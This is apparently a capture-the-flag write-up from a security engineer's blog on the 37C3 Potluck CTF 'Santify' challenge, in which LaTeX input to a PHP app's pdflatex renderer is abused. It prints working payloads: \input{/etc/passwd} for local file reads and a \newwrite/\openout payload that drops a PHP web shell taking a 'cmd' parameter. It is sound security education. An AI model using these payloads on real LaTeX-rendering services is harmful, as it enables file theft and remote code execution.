./dr3dd

Application Security Engineer

Blogs

About

Resume

CVE's

GitHunt

37C3 Potluck CTF 2023 - Santify

by on under Web
2 minute read

Santify

This week, I participated in the 37C3 Potluck CTF and solved a few challenges, among which I particularly enjoyed the Santify challenge. Therefore, I decided to write a blog post about it.

Challenge Description

Challenge Image

The challenge’s backend is written in PHP and includes the following functionalities:

  1. User Login/Registration.
  2. Create a gift card that supports Markdown/LaTeX for mathematical expressions.
  3. Send gift cards to other users or to yourself.

While creating some notes by adding LaTeX expressions, I encountered the following error:

Error Image

Here’s what I figured out from the error:

  1. It takes user input and appends it inside a LaTeX file latex.tex like the following:

     \documentclass[18pt]{article}
 \thispagestyle{empty}
 \begin{document}
 ${user input}$
 \end{document}
  2. Then, it uses pdflatex to compile the LaTeX file and convert it into a PDF/PNG in a specific output directory.
  3. As we can see from error below cmd is executing on backend:
    timeout 10 pdflatex -no-shell-escape -interaction=nonstopmode -output-directory /app/images/a8780fmandpjqbfppogg /app/images/a8780fmandpjqbfppogg/latex.tex
  4. Notably, the use of -no-shell-escape implies the inability to directly execute shell commands with \immediate\write18{cat flag.txt}. The log file will display “disabled” when attempting to run shell commands.
  5. However, it is possible to include local files using \input{/etc/passwd}. Error Image Error Image
  6. But while including flag file \input{/app/flag.txt} got this message: Error Image
  7. This suggests that a simple LFI (Local File Inclusion) attack will not be sufficient; there is a need to escalate to RCE (Remote Code Execution) to execute the /app/readflag binary.
  8. Initially, various attempts were made to execute commands by referring to the LaTeX official documentation, but none were successful. A breakthrough came when considering the backend is PHP, leading to the idea of creating a PHP file in the same path as the PDF/PNG using LaTeX.

  9. So, i googled if there are any option we can create any arbitrary file using LaTeX with controlled content. I Got this :

      \newwrite\mytextfile
  \immediate\openout\mytextfile=abc.txt
  \immediate\write\mytextfile{hello}

  10. It successfully created a abc.txt file in image directory:
    http://challenge15.play.potluckctf.com:31337/images/9fc7o182n43naghibl5h/abc.txt

  11. Now it’s time to create a php shell file. Final payload:

        $\leftarrow$
    \newwrite\mytextfile
    \immediate\openout\mytextfile=abc.php
    \immediate\write\mytextfile{<?php echo system($_GET['cmd']);?>}
    $\leftarrow$
  12. It created a abc.php file in same dir. Time to execute /app/readflag binary. http://challenge15.play.potluckctf.com:31337/images/9fc7o182n43naghibl5h/abc.php?cmd=/app/readflag Error Image

flag : potluck{christmas_brings_the _categories _together}
Web, 37C3 Potluck CTF 2023, Santify
comments powered by Disqus